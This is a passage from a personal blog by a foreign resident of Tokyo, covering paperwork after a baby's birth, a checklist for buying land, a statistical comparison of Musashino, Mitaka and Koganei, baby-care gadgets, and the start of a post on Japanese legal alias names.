Tokyo gives 5,000 yen/month to all kids 0-18 years old regardless of their parents income (as long as they live in Tokyo). Apply for this online on https://018support.metro.tokyo.lg.jp/ You will need the 住民票 listing the baby’s name, without the MyNymbers (requested earlier)

9. Embassy: register the baby at the embassy

I haven’t done this, but I’m supposed to register the baby at my embassy and get them a passport.

Some countries have child allowance programs that citizens living abroad can also take advantage of, so you might want to check if you can get some free money from your country.

10. My Number Card [optional]

I also got a MyNumber Card application form for the baby at the city hall, and I could complete it online (had to scan the QR code on the form and upload a photo of the baby, since the rest of the form got pre-filled at the city hall). We got the notification to pick up the card 2 months later, and went with the baby to pick it up.

Having a My Number Card for the baby is nice, as this is likely their only photo ID (the insurance card also works like an ID, but that doesn’t have a photo), which helps with things like applying for passport. Also insurance cards are slowly being merged into My Number Card, so it might become sort of mandatory in the future anyway.

11. Passport [optional]

Japanese passports for people of Tokyo are handled by Tokyo’s Bureau of Citizens, Culture and Sports with extra rules for minors getting a passport:

a parent has to be present
the passport will be valid for 5 years and cost 6,000 yen
required ID (one of the following):
- My Number Card
- driving license (not relevant for a baby)
- health insurance card AND mother-child handbook (or a student ID card (with photo) or student handbook (with photo), but those are not relevant for a baby)
the parent’s insurance card is also checked

We haven’t got this for our baby, so I don’t have personal experience with this.

What to check before buying a land in Tokyo

2024-04-22T00:00:00+00:00

We are currently at the final steps of buying a land in Tokyo, so in this post I’ll share the information we checked when considering a given land. In an earlier post I looked at comparing the data on cities of Tokyo, which gives a good high level view, while this post will look at data-sources that are useful when looking at a specific land.

Reference layout

I highly recommend to only look for a land after you have decided the house builder, as some builders can’t build on some lands (e.g. if they use cranes to assemble the house, those need to be able to reach the land). So visiting any potential land with the house builder is very important. I also highly recommend asking them to give you a rough layout, just to make it easier to imagine how a house would look like there (ask them to include furniture in the design to make it easier to feel the space). This also helps clear up any major issue with building regulation, e.g. height limitations and limits on blocking sunlight from the house to the North can make solar panels or lofts impossible in certain lands. So sharing your approximate ideal design with the house maker and checking if your must-haves are possible will save you headaches later on.

Nearby

Use Google Maps to map out what’s nearby.

Transportation

Distance to the nearest train stations is probably on the forefront of everyone’s mind. Make sure to check the time in both direction (to and from the station), as they can be different if there are slopes (and real estate postings will likely show the shorter time).

If you are not right next to the station, also consider how you’ll get there. When checking buses, check both ways (as some routes will be circular or follow different path due to one-way streets). Also make sure the bus you are looking at goes regularly, as some only go once an hour.

Parking at the station for cars and bikes is also worth checking, if you are considering that.

Shops and restaurants

My only advice is to check the opening hours, as I’ve found some bakeries that would only open on one or two days a week. (Having a good bakery nearby was important for me.)

Schools

Don’t trust the real estate listing, as they often list the geographically nearest schools, but for public schools kids can only go to the one that’s school district the address belongs to. (Which is often but not always the closest.) Googling 学区域 and the name of your city will bring up the map (example). Elementary school is likely to be the most important, but junior high and high schools are also worth checking (as school districts will be different).

Other than the distance to the school, the road to the school is also important (any high traffic road without sidewalk on the way?). Walking around is likely the best, but a quick look on Google Street View can help rule out some lands, saving you a visit.

We found a cheap land but this would have been the road to the station:

Also check juku (cram schools), English schools, international schools, if they might be interesting for you.

Parks

Spending time in nature is proven to make you happier, so checking the nearest green spaces is important. It’s also important to know about any nearby nature conservation areas and non-flowing waters as they can be a source of mosquitos and other bugs (if that’s a concern for you).

Hospitals and fire stations

Living close to a hospital or fire station (or any major road leading to them) will likely mean a regular sound of sirens, also during the night, so be aware. On the other hand having a bigger hospital in 10-15 minutes drive away can literally be lifesaving, so keep them close but not too close.

Airports

Similarly because of the noise, it’s important to check if there is any nearby airport (especially military ones), or if you are under the flight routes to a big airport (likely you’ll see if this is an issue when you are walking around, but it worths paying extra attention to).

Hazard map

In the land of natural disasters, it’s vital to be prepared. Each city publishes a hazard map highlighting all potential disasters and how bad they are expected to get. Just google “city name 防災マップ” or “ハザードマップ”　(example). Make sure you understand what any note means, and if in doubt, ask your real estate agent. The real estate agent should show this map to you before you sign the contract, but I think it’s better to take the time to research it before hand. Also you can check with the house builder if the given hazard is something they can mitigate, e.g. Ichijo can make the house float but it costs extra.

Zoning map

Japan gets praised a lot over their very permissive building zoning laws, which essentially means that zoning rules are the main thing that can limit what your neighbors can build (you don’t need to ask them for permission, but neither do they). Just google “city name 計画図” or “city name 用途地域等” and check your area.

We were looking at a land in Zone #1 (50%/80%), which essentially means 2 story homes: 50% of the land can be covered with building and the overall floor area can be up to 80% of the land size. The second neighbor to the South was facing a major road, but the noise wasn’t bad behind the two houses, and both houses were 2 story apartment buildings. However checking the zoning map we learned that both of those lands fall into Zone #3 (80%/300%) which essentially allows 4 story buildings. So if the area continues developing, there is a chance that those houses will be taken down and a 4 story building built in their place. Since this was the South side of the land, that would block out much of the sun, and remove any privacy from our small garden (no more pool party for the kids). We passed on that land.

Private road

Regular roads are owned and maintained by the city, however when a bigger plot of land is split up, the new lands must keep their connection to the road, which often leads to part of the old land turning into a road. The land under this road however is owned privately (hence the name, private road, 私道). The existence of private road is usually on the real estate listing.

If there is a private road, it’s important to check a few things:

Will you get partial ownership of the road? If not, you might need to get a permission from the owner to do any construction (e.g. water or gas connection), which can be an issue.
Is there an explicit “permission to drill” 掘削に関する覚書 document that would allow work on connecting utilities? Again addressing the same issue. (more info)
Rules of maintenance of the private road: will you need to pay a portion of it, or will the city take care of it? Who manages the maintenance work?

The real estate agent should be able to get the answers for these, or you can ask them at the city hall.

Trash collection method

How is trash collected? Do you just put it in front of your house (戸別収集) or is there a local garbage station you need to bring the trash to (ステーション収集)? The downside of the second is that the neighbors also need to keep that station clean, which often involves a having to clean it when it’s your turn.

Neighborhood associations

There might be a neighborhood association in your area (自治会 or 町内会), which might involve managing the garbage station or a message board. The real estate agent should be able to figure it out if there is one, or you can ask at the city hall. (More on these here.)

Did someone die on the land? 事故物件

Even if you don’t believe in ghosts, the resale value of a land can be affected if someone died there (especially if it was a violent death). The real estate agent has to disclose this to potential buyers (legal requirement) and there is no expiration limit in the law, so it worth checking it (if for nothing else: to use it to ask for a discount). https://www.oshimaland.co.jp/ has a map, and Google Translate can help understand what happened at a given address.

Annoying neighbors 道路族マップ

Another map that’s worth checking is 【あぶない】道路族マップ【うるさい】 which includes user reports about nuances, like

There is a large park next to it. Despite this, children play and make strange noises on the road. Why play on the road instead of in the park? Can’t we just teach them that the road is not a place to play?”

and

From 7 a.m. on Saturdays and Sundays, they ring the tricycle’s bell and run wild down the road screaming. At least 3 people, if things go wrong, there will be about 6 people from the neighborhood.

So yeah, it shows nuances, but it also shows annoying neighbors who will complain about kids being kids. Of course just because this map doesn’t show anything for your area, doesn’t mean that all neighbors will be angels, but it doesn’t cost anything to check.

Summary

So that’s it. When we liked a land, I collected these infos into a Google Doc to keep it for easy reference, and also sent any question to our real estate agent. We also included a section in the doc about our concerns, and any information we could find on those. I also shared this document with my friends, and they provided additional tips on what to think about and sites to check (which I included in this post), so huge thanks to them for that.

Update

After talking with others, I have a few additional things to add to the list.

Urban Planning Facilities (都市計画施設)

Cities make decade long ‘master plans’ for things like new roads, parks, schools, etc. Then when the houses in the area get old and the owners want to sell, the city buys the lands, and later builds what they have planned.

Sometimes plans change, and the city might decide not to pursue an original plan. When this happens, the city will allow new houses to be built (都市計画法53条許可), so it is generally fine (apart from a small application fee for the extra permit). However one thing to note is that houses built on area like this will ineligible for the 長期優良住宅 (Long-term Quality Housing) certification. If the house would otherwise qualify for this, then being in an area like this might result in lower government subsidies and higher real estate tax (but both of these depend on the exact city).

Fire Protection Districts (防火地域)

Some areas are marked as Fire Protection Districts (防火地域) or Quasi-Fire Protection District (準防火地域), and buildings in these are required to fulfill stronger fire resistance rules. This rules out some windows (especially big ones), might require you to install shutters, and generally increases the costs.

For Ichijo, I’m not sure if it changes their design or windows options, and it only adds slightly to the costs. After talking with a friend who built a similar size house around the same time in a Quasi-Fire Protection District (準防火地域) area, their base price (建物本体工事御見積書, Main building construction) was only ~2% higher for making it semi-fireproof (準耐火仕様) compared to ours, so it doesn’t seem to make that much of a difference.

Comparing cities to live in: Musashino vs Mitaka vs Koganei

2024-04-19T00:00:00+00:00

We decided to build our own house in Tokyo. We narrowed down our area to the following stations on the Chuo line: Mitaka (Mitaka City), Musashi-sakai (Musashino City), Musashi-Koganei (Koganei City). We also considered Kichijoji, but it was way out of budget (also it gets very crowded on weekends), and Higashi-Koganei (the station between Musashi-sakai and Musashi-Koganei), but currently it lacks the shops and amenities that we got used to. It is being actively developed, so it might get there in the next 5-10 years, but it’s also between two pretty well developed stations, so chain stores might pass on opening their stores there (e.g. both neighboring stations have Ito-Yokado shopping malls, making it unlikely that there would be one in Higashi-Koganei in the future).

Choosing where to live is one of the truly life-altering decisions, especially for our children (as it affects which school they go to, their friends and also influences their career). While big part of this can’t be foreseen, I decided to take a look at the data available to compare these cities. I believe the same data is published for most cities in Japan, so even if you are looking at other places, this post might be able to help you make your own comparison.

I tried to use data from around the same time and time period, though it wasn’t always possible (some data only gets published a few years late, or not every year), so I’ll indicate which date the data is from.

Disclosure: when I originally collected most of this data we were still looking for a land in all these places, but by the time of writing this post we are in the middle of buying a land in Musashino. This won’t change the numbers (those are all from the linked sources), but might affect my interpretation due to confirmation bias (we made our choice and I want to believe we made the right choice). So take any positive opinion of Musashino with a grain of salt.

Population

Most metrics only really make sense on a per resident basis (e.g. city budget, number of schools), so it’s important to start with the population.

Population (2023. December) Source: 住民基本台帳による世帯と人口：毎月

	Musashino	Mitaka	Koganei
Population	147,851	190,071	124,721
Households	78,685	96,814	62,937
Household size (person per household)	1.88	1.96	1.98

Age groups

With Japan being a super-aging society, it’s a good data point to know how many kids, adults, and elderly live in a given city, as this will influence policies (which group the city should support), but also what types of shops open in the area.

Population per age group (2024. January) Source: 区市町村、年齢3区分別人口（人口総数）

	All of Tokyo prefecture	Musashino	Mitaka	Koganei
0-14 year olds	11.07% (1,540,731)	11.75% (17,373)	12.31% (23,382)	12.58% (15,682)
15-64 year olds	66.33% (9,227,915)	65.69% (97,090)	65.60% (124,610)	65.86% (82,071)
Above 65 years	22.59% (3,143,256)	22.56% (33,346)	22.09% (41,967)	21.56% (26,861)

Overall all 3 cities are almost identical in this regard.

Foreign population

Being from Europe, my kids will not look 100% Japanese, so knowing how much they will stand out at school is important. As the majority of foreigners in Japan are from other Asian countries, I also looked at data on which continent the foreign population is from. (There is data published down to the country-of-origin-level.)

Foreign population (2024. January) Source: 区市町村、国籍・地域別外国人人口

	All of Tokyo prefecture	Musashino	Mitaka	Koganei
Foreign population (% of the entire population)	4.65% (647,416)	2.52% (3,719)	2.28% (4,332)	2.58% (3,212)
From Asia (% of the foreign population)	87.69% (567,699)	78.57% (2,922)	74.68% (3,235)	83.72% (2,689)
From Europe (% of the foreign population)	5.71% (36,999)	7.93% (295)	10.55% (457)	5.39% (173)
From Africa (% of the foreign population)	0.69% (4,477)	0.43% (16)	1.39% (60)	0.93% (30)
From North America (% of the foreign population)	3.92% (25,356)	9.63% (358)	9.86% (427)	7.75% (249)
From South America (% of the foreign population)	1.24% (8,046)	1.86% (69)	1.69% (73)	1.37% (44)
From Oceania (% of the foreign population)	0.69% (4,468)	1.59% (59)	1.75% (76)	0.84% (27)

Overall Musashino and Mitaka are pretty similar in this regard. Koganei has slightly more foreigners, but a higher percentage of them come from Asian countries. This might be due to many universities being in and around Koganei, and it’s being the cheapest out of the 3 cities (so international students from Asian countries might prefer living there). But this is just my guess, overall the numbers are close enough that I don’t think this would result in any meaningful impact on our daily life.

Sidenote: since the statistics include per country breakdown, I also checked how many other Hungarians live in each city. Musashino: 1, Mitaka: 5 (I’m one from this), Koganei: 0. (In the entire Tokyo prefecture there are 254 Hungarians, but 211 of them (83%) live within the 23 Special Wards of Tokyo.)

Daytime population

People often commute for work or school, so the people living in a city (night time population) and the people being there during the day (daytime population) can look different. Tokyo does a census on this every 5 year, I’ll be using the numbers from the 2020 census.

Apart from the number of people in the city during the day, the census also shows the number of people commuting for work (通勤者) and for school (通学者). (The census notes that this doesn’t include the entire daytime population, as some people don’t work or study, and also the census doesn’t have data on what everyone does.) Moreover the census includes information on the flow of people too, e.g. some people living in the city will leave for work, while others will enter for work, so just the number of workers in the city during the day alone won’t show the full picture.

Daytime, nighttime population and daily flow of people (2020) Source: 令和2年国勢調査による東京都の昼間人口（従業地・通学地による人口）

	Musashino	Mitaka	Koganei
Nighttime population (residents of the city) 常住人口	150,149	195,391	126,074
Daytime population 昼間人口	162,221	175,413	110,012
- compared to residents	8.04%	-10.22%	-12.74%
Resident workers (workers living there)常住就業者	64,433	82,769	54,114
Daytime workers 昼間就業者	69,408	63,348	33,399
- compared to resident workers	7.72%	-23.46%	-38.28%
Workers leaving 流出通勤者	41,511	52,685	37,590
- compared to resident workers	64.43%	63.65%	69.46%
Workers entering 流入通勤者	46,486	33,264	16,875
- compared to resident workers	72.15%	40.19%	31.18%
Resident students (students living there) 常住通学者	15,622	22,206	14,067
Daytime students 昼間通学者	22,719	21,649	18,720
- compared to resident students	45.43%	-2.51%	33.08%
Students leaving 流出通学者	5,575	7,174	4,821
- compared to resident students	35.69%	32.31%	34.27%
Students entering 流入通学者	12,672	6,617	9,474
- compared to resident students	81.12%	29.80%	67.35%

Mitaka and Koganei both looses ~10% of their population during the day, while Musashino gains 8%. As all 3 cities are residential, Musashino’s increased daytime population might be due to Kichijoji being a popular shopping destination.

63% of workers living in Mitaka leave during the day, and only 2/3 of this much enters. Koganei is even starker: 70% of workers leave during the day, and only less than half of this many enters. Musashino’s workers also leave in comparable numbers (64%), but they have more workers entering during the day. Since workers include people working in factories and offices in the city, but also people working in retail and hospitality (shops, restaurants, bars), this can be again due to Kichijoji (even if the people go there for shopping, the shops and restaurants need staff who will be counted as workers). It’s also interesting to see that while Musashino seem to have more work opportunities, people still prefer to leave the city in the same proportions as residents of the two other cities, and the jobs are taken up by people commuting into the city. This could mean that those jobs don’t pay enough to let people afford living there.

When it comes to students, both Musashino and Koganei attracts many students increasing their student population by 45% and 33% respectively, while Mitaka looses 2.5% of the number of their students. This difference almost entirely comes from students entering the cities, as all 3 cities have around 33% of their students leave the city during the day, but Musashino and Koganei simply has more students commuting there. Even though all three cities have many high schools and universities (Musashino, Mitaka, Koganei), it seems that students just don’t go to Mitaka: if we look at the ratio of daytime students per residents we get 15.13% for Musashino, 11.08% for Mitaka and 14.85% for Koganei (as we have seen earlier, all 3 cities have a similar proportion of young people, so there are simply less students choosing to commute to Mitaka). Overall this is likely not an issue for living in Mitaka though, as many kids commute for junior high and high school anyway, and all 3 cities are very close (it’s a 13 minute train ride back to back from Kichijoji to Musashi-Koganei).

Education

Education is one area where cities can differ, so I took an extra look into the available data. Tokyo publishes the 学校基本統計（学校基本調査）- School Basic Statistics (School Basic Survey) each year, with the most recent being from 2023. This includes the number of schools of various levels, number of classes, number of teachers, etc. I’ll share some numbers that I found interesting.

Elementary schools (2023)

	Musashino	Mitaka	Koganei
Nr of kids	8,173	9,879	6,751
Nr of kids in public elementary school (and % of overall nr of kids)	6,526 (80%)	9,478 (96%)	6,132 (91%)
Nr of teachers	466	529	338
Teacher per class	1.64	1.61	1.55
Teacher per class in public schools	1.59	1.60	1.56

Musashino has more than twice as many kids in non-public (private, international) elementary school as the other cities. This can mean that the public schools are of lower quality, or that the parents have more money and thus more options. The teacher per class numbers are very similar, with Koganei being slightly lower, which can mean that the quality is lower, or that the number of kids is growing faster than the rate they can hire teachers.

Overall I don’t think any of this indicates a significant difference in the quality of education.

Schooling in Japan is mandatory until the end of junior high school (15 years of age), so let’s see what kids do after that:

What students do after graduating junior high school (Data from the 2023 graduations)

	All of Tokyo prefecture	Musashino	Mitaka	Koganei
Go to high school	98.65%	99% (1,466)	97.5% (1,435)	96.4% (1,245)
Go to vocational school	0.5%	0.6% (9)	1% (14)	3.3% (43)

(Numbers don’t add up to 100% as some doesn’t continue their education.)

Overall Musashino and Mitaka is almost identical, while Koganei has a slightly higher percentage going to vocational school. But the sample size is so small, that it’s hard to make any conclusions. It is very likely that in either city our kids’ classmates would mostly continue to high school.

What students do after graduating high school (Data from the 2023 graduations)

	All of Tokyo prefecture	Musashino	Mitaka	Koganei
Go to university	72.8%	81.5% (1,032)	81.8% (716)	86% (1,150)
Go to vocational school	15.26%	11.6% (147)	9% (79)	7.9% (104)
Start working	4.6%	0%	0.2% (2)	1% (14)

All 3 cities send around the same percentage to university (with Koganei being slightly higher, but that might be due to more student going to vocational school already after junior high school). At the end of the day, this again means that in either city our kids’ classmates would mostly go to university.

Car ownership

In central Tokyo most people don’t use cars everyday, while on the countryside people tend to drive more often. So looking at the number of cars in a city can tell us about how it feels to live there (e.g. more cars likely mean more traffic, but also shops and restaurants will have parking lots).

The Kanto District Transport Bureau publishes car ownership numbers in March every year, and I’m using the latest data from March 2023. For the number of households, I’m using the March 2023 data from the Statistics of Tokyo website.

The data has multiple car categories, and here is ChatGPT’s explanation of each category:

貨物計 (Kamotsu-kei) - This refers to cargo vehicles, encompassing all vehicles primarily used for transporting goods. This category includes various sizes of trucks and freight vehicles.
乗合計 (Noriai-kei) - This category covers public transport vehicles or vehicles used for mass transportation of passengers, such as buses and coaches.
乗用計 (Jōyō-kei) - This term refers to passenger cars, which are vehicles used primarily for personal transport of passengers. It generally includes sedans, hatchbacks, SUVs, etc.
特種(殊)計 (Tokushu-kei) - This category is for special purpose vehicles, which are designed for specific functions other than just transporting goods or people. This can include vehicles like ambulances, fire trucks, construction vehicles, etc.
登録車計 (Tōroku-sha-kei) - This translates to registered vehicles total. It is a summative category that typically includes all motor vehicles that are officially registered, likely excluding those that do not require registration such as certain small or specialized vehicles.
小型二輪 (Kogata nirin) - This refers to small two-wheeled vehicles, such as motorcycles and scooters. These are typically smaller bikes that fall under a certain engine size or power output.
合計 (Gōkei) - This simply means total and sums up all the categories listed above.

For each of these, there are 2 numbers published (again ChatGPT’s explanation):

自家用 (Jikayō) - This term means private use. It refers to vehicles used for personal, non-commercial purposes. These are typically cars, motorcycles, or other vehicles owned by individuals for personal or family use.
事業用 (Jigyōyō) - This term stands for business use. It includes vehicles used for commercial purposes, such as company cars, delivery trucks, taxis, buses operated by transport companies, and other vehicles used in the course of conducting business or providing services.

Passenger cars (乗用計) make up more than 90% of private cars, so I’m only looking at that number. For business use I’m looking at all numbers, as those can tell us about the type of businesses that are registered in each city.

	All of Tokyo pref	Musashino	Mitaka	Koganei
Number of households	7,451,160	78,261	96,135	62,617
Total number of cars	3,074,602	26,744	40,786	24,741
- Per 100 households	41.3	34.2	42.4	39.5
Personal cars (自家用特種(殊)計)	2,917,997	25,837	38,188	24,386
- Per 100 households	39.2	33.0	39.7	38.9
- Personal passenger cars (自家用乗用計)	2,545,220	23,956	34,777	22,773
-- Compared to all personal cars	87.22%	92.72%	91.07%	93.39%
Personal motorcycles (自家用小型二輪)	184,152	1,363	2,581	1,367
- Per 100 households	2.47	1.74	2.68	2.18
Corporate cars (事業用登録車計)	156,605	907	2,598	355
- Per 100 households	2.10	1.16	2.70	0.57
- Compared to all cars	5.09%	3.39%	6.37%	1.43%
- Corporate cargo vehicles (事業用貨物計)	79,972	83	625	101
-- Compared to all corporate cars	51.07%	9.15%	24.06%	28.45%
- Corporate public transport vehicles (事業用乗合計)	10,868	320	13	51
-- Compared to all corporate cars	6.94%	35.28%	0.50%	14.37%
- Corporate passenger cars (事業用乗用計)	43,762	439	1720	140
-- Compared to all corporate cars	27.94%	48.40%	66.20%	39.44%
- Corporate special purpose vehicles (事業用特種(殊)計)	22,003	65	240	63
-- Compared to all corporate cars	14.05%	7.17%	9.24%	17.75%
Corporate motorcycles (事業用小型二輪)	304	3	4	3
- Compared to all motorcycles	0.16%	0.22%	0.15%	0.22%

So in all of Tokyo, on average less than half of the households have a car (41.3 cars per 100 households). Musashino has even less (34.2), while Mitaka (42.4) and Koganei (39.5) are around the Tokyo average. Only around 1-2% of this is corporate cars, the rest is registered by individuals.

When it comes to corporate cars, in Tokyo half of them are cargo vehicles, followed by 28% of passenger cars (this includes taxis too). Meanwhile in all 3 cities the main corporate car is passenger cars (48%, 66%, 39%), with the second most popular being cargo in Mitaka and Koganei, and public transport vehicle in Musashino. My guess is that this is simply due to more bus companies having their vehicles registered in Musashino, as I’m pretty sure Mitaka has more than 13 buses going around on any given day. Since all corporate cars make up only around 1-2% of vehicles, I don’t think these differences change the everyday feel of the cities.

There are only 2-3 motorcycles per 100 households, and almost no corporate motorcycles (less than 0.3% of all motorcycles). This latter is actually surprising for me, as I thought delivery scooters (pizza chains, soba restaurants, newspapers) will make this number bigger.

Overall all 3 cities are fairly similar in this regard, with Musashino having slightly less cars registered per household.

City budget

The Ministry of Internal Affairs and Communications publishes a set of massive Excel spreadsheets that contain the budget (income, spending, source of both) for all municipalities of Japan (each city being a line in the table).

At the time of my research, their latest data was from 2021, so that’s what I’m using here. The data is using thousand yen (千円) as the unit, so I’ll be using that to display the numbers.

The table also includes population for each city, and I’m using that for the per resident calculations (since the date of this data is different from the data earlier, this is slightly different than above).

General budget

Source: 都市別概況.

	Musashino	Mitaka	Koganei
Population	148,025	190,590	124,617
Income	80,799,412千円	80,516,306千円	53,583,172千円
- per resident	545.85千円	422.46千円	429.98千円
Expenses	76,957,203千円	78,311,614千円	51,719,510千円
- per resident	519.89千円	410.89千円	415.03千円

All 3 cities run a healthy budget (spending less than their income). Mitaka and Koganei works with similar per resident income and spending, while Musashino earns and spends 25-30% more than the others (per resident).

Income source

The income source is also published for each city, so I’ll pick some numbers from this.

Source: 都市別歳入内訳

	Musashino	Mitaka	Koganei
tax	39,928,376千円	38,398,512千円	21,986,121千円
- % of overall income	49.42%	47.69%	41.03%
- per resident	269.74千円	201.47千円	176.43千円
- (within tax): residence tax(市町村民税個人分)	18,132,872千円	18,348,371千円	11,176,817千円
-- per resident	122.50千円	96.27千円	89.69千円
- (within tax): business tax(市町村民税法人分)	2,556,045千円	1,472,492千円	590,996千円
-- per resident	17.27千円	7.73千円	4.74千円
- (within tax): real estate tax (固定資産税)	16,352,346千円	14,541,109千円	7,733,616千円
-- per resident	110.47千円	76.30千円	62.06千円
National treasury disbursements (国庫支出金) -money from the national government for specific projects	14,774,575千円	18,949,625千円	13,793,957千円
- % of overall income	18.29%	23.54%	25.74%
- per resident	99.81千円	99.43千円	110.69千円
Prefectural disbursements (都道府県支出金) - general money from the prefecture	8,337,069千円	10,170,974千円	8,037,565千円
- % of overall income	10.32%	12.63%	15.00%
- per resident	56.32千円	53.37千円	64.50千円

This shows that Musashino and Mitaka receive similar amounts (per resident) from the central and prefectural governments, while Koganei collects 13% less from taxes than Mitaka (on a per resident basis), but they make up for it by receiving more from the central and prefectural governments leading to a similar budget in the end. This can make Koganei riskier in the long term than Mitaka (regardless their current similar budgets), as with the aging population the central and prefectural governments might have less money in the future.

Looking at the tax explains why Musashino’s budget is more than the other two cities: they get almost 34% more from taxes (per resident) than Mitaka and 52% more than Koganei. This comes from all types of taxes:

residence tax (27% and 36% more than Mitaka and Koganei): the proportion of the working age population of all 3 cities is almost identical, and since the residence tax is a flat 6%, this means that the average salary in Musashino is 27% and 36% higher than Mitaka and Koganei respectively (assuming a similar percentage of working age people working).
Musashino’s per resident business tax income is more than double of Mitaka’s and 3.6x more than Koganei, indicating that they have more companies. I didn’t go into details on how this tax is calculated, but my guess is that this is mainly due to Kichijoji’s shopping district which attracts huge crowds every weekend
similarly the real estate tax income is the highest in Musashino, my guess again being that Kichijoji’s land values are through the roof (partially due to all the shops, but also due to all the rich people having their house there) resulting in a higher real estate tax revenue (my understanding is that real estate tax is a fixed % of the assessed land and building value, so it being higher means that the value of real estate is higher)

Expenses

Data is also published on how the cities spend their money. 目的別歳出内訳 shows the purpose of the spending (e.g. welfare, education) and 性質別歳出内訳 shows the nature of the spending (e.g. salary). I’ll show some numbers from the former about welfare and educational spending.

	Musashino	Mitaka	Koganei
public welfare	33,215,646千円	41,707,752千円	26,697,093千円
- % of overall	43.16%	53.26%	51.62%
- per resident	224.39千円	218.83千円	214.23千円
- child welfare	14,863,633千円	19,222,396千円	14,553,676千円
-- per resident	100.41千円	100.86千円	116.79千円
educational expenses	13,796,513千円	7,871,068千円	4,276,149千円
- % of overall	17.93%	10.05%	8.27%
- per resident	93.20千円	41.30千円	34.31千円
- general expenses	4,934,066千円	2,607,578千円	850,611千円
-- per resident	33.33千円	13.68千円	6.83千円
- elementary school	1,777,769千円	2,031,009千円	863,945千円
-- per resident	12.01千円	10.66千円	6.93千円
- junior high school	925,344千円	789,519千円	482,268千円
-- per resident	6.25千円	4.14千円	3.87千円
- social education	1,780,268千円	857,003千円	677,956千円
-- per resident	12.03千円	4.50千円	5.44千円
- sport facilities	1,147,760千円	593,399千円	739,897千円
-- per resident	7.75千円	3.11千円	5.94千円
- school lunch	3,231,306千円	992,560千円	661,472千円
-- per resident	21.83千円	5.21千円	5.31千円

Despite Musashino having a higher average income, they still spend to most on welfare among the 3 cities, but the difference is not that significant.

Educational expenses on the other hand show that per resident Musashino spends more than twice of Mitaka and almost 3x of Koganei. This is a huge difference, so I wanted to drill down a bit, but couldn’t find a single reason why the difference (having items like “general expenses” also don’t really help).

Spending 4x as much as the other cities on school lunches is also interesting, as I expected that this would make school lunches free in Musashino, but the price students need to pay seem to be the same in all three cities. Musashino says on their website that the price of school lunches is used to cover the costs of ingredients, and the city pays for staff, utilities, and maintenance.

So I decided to look into other years to see if this was just an outlier year (e.g. due to some one-time big purchase like buying land for a new building, or organizing some national competition), or if this is a persistent trend.

Spending on eduction for 2019 (source), 2020 (source), 2021 (as above), 2022 (source), using 2021 population numbers for the per resident spending:

Educational expenses	Musashino	Mitaka	Koganei
2019	9,673,062千円	7,981,140千円	3,640,677千円
- per resident	65.35千円	41.88千円	29.21千円
2020	10,036,056千円	8,182,037千円	4,695,724千円
- per resident	67.80千円	42.93千円	37.68千円
2021	13,796,513千円	7,871,068千円	4,276,149千円
- per resident	93.20千円	41.30千円	34.31千円
2022	12,127,456千円	8,656,292千円	3,987,496千円
- per resident	81.93千円	45.42千円	32.00千円
4 year’s average (per resident)	77.07千円	42.88千円	33.30千円

So Musashino seems to be consistently spending more than the other 2 cities, but 2021 was an outlier even for them. In the 4 year average they are spending 80% more than Mitaka and 2.3x as much as Koganei.

Conclusion

It was interesting to see that in some metrics these 3 cities are almost identical, and in others they show big differences. It has also been fun to try to guess what might be behind the difference in numbers.

Overall I believe all 3 cities are very similar in most meaningful metrics. Musashino having a higher budget, and especially spending more on education is definitely a plus, but I can’t say that this makes the other cities bad options.

Tech that helped us during the first months with a newborn baby

2024-03-14T00:00:00+00:00

I work in tech, and while I try to maintain a healthy work-life balance, I still use many gadgets, so I thought to share which tech solutions helped us during the first month with our newborn baby.

Mobile app for baby tracking

In the hospital we were asked to keep track of when the baby ate, peed, and pooped, and the midwifes would regularly check this paper form. When we got home initially we were using a similar paper-based method, but then changed to a mobile app, and it has been a game changer. We can record on either one of our smart phone or smart watch and it syncs immediately. It also calculates how much time since the last feed/sleep/diaper change, which can help us plan (the baby will wake up soon) and also understand why she is crying (if she just ate 30 minutes ago but hasn’t had her diapers changed in an hour, then it might be diaper).

Based on a friend’s recommendation we went with the app named PiyoLog which is developed by a Japanese company, but has English UI too.

The free version works perfectly fine. If you pay, you get additional icon sets and colors, and the removal of a non-intrusive add from the bottom of the screen. I decided to pay just to support the developers (this is the first WearOS app that I find actually useful), but going with the free version is also totally fine.

Smart watches (for parents)

Both my wife and I have the 1st gen Pixel Watch, and it has been super helpful to help us keep track of our sleep. When we see that we only slept 5-6 hours a night, then we know we have to take a nap during the day, otherwise we will be really exhausted by 7pm (and that’s the time our baby tends to get fussy).

Also the app we use to record things about the baby (see above) has a companion app that works on WearOS, so when we change diapers in the middle of the night, it’s very easy to record it on the watch.

Baby monitor

I guess this is pretty self-explanatory: when the baby sleeps during the day, it’s nice that we can close the door of the bedroom and still keep an eye on her. Based on a friend’s recommendation we went with CuboAI Plus (referral link), but sofar the smartness part is more of a nuance than actually useful.

It detects if the baby’s face is covered and sends a notification to the phone. However our baby moves a lot and often brings her hand in front of her face for a few seconds, which results in a notification. There is also a notification every time the baby enters and leaves the view of the camera, which at this age only happens when we put the baby to bed or take her out, again not very useful at this point. There is also cry detection, which sends notifications too, even if the baby is not in her crib. So I’m often holding the baby, she cries, then I get a notification.

What works really well though is the night vision: even in pitch dark room the camera feed is fully visible (although in black and white), and the ability to go check the history and save images or videos from the past. Also the camera works with Google Home, so we can put the camera feed on our Nest Hub, which is really helpful when the baby is sleeping and we are in the living room.

Smart speaker

Our baby needs a lot of rocking, and walking around with her, and putting on some music during this helps us maintain the rhythm, and it also smooths the baby. Having a smart speaker (in our case a Nest Hub) is a great way to play the music.

Thermometers

Our baby was born in February, so rooms getting too cold is a concern. We put thermometers into all rooms and the crib, and often check on them to see if the temperature is still good. They also measure humidity, and we have been using humidifiers in the bedroom and living room to help with that.

Dimmable lights

After dinner we want to get the baby ready to sleep, so we change our lights to warm white and dim them, then after going to bed we dim the lights in the living room and the room with the diaper changer to minimum. This gives us enough light during the night when we wake up with the baby, but also clearly signals to her that it’s still night and she needs to go back to sleep.

Food delivery

Not directly tech gadget but using food delivery services like Uber Eats have been really helpful when we are both exhausted. Also we had a few guests coming over to meet the baby, and it helps that we could just order food and not having to worry about that.

Japanese alias name (通称名, tsūshōmei)

2024-03-05T00:00:00+00:00

Japan allows foreigners to register a legal alias (通称名, tsūshōmei) and use it as their name in some situations. In this post I’ll describe why and how I did this, and what it changed for my everyday life.

My reason

So why did I decide to register a Japanese alias? It’s all about family.

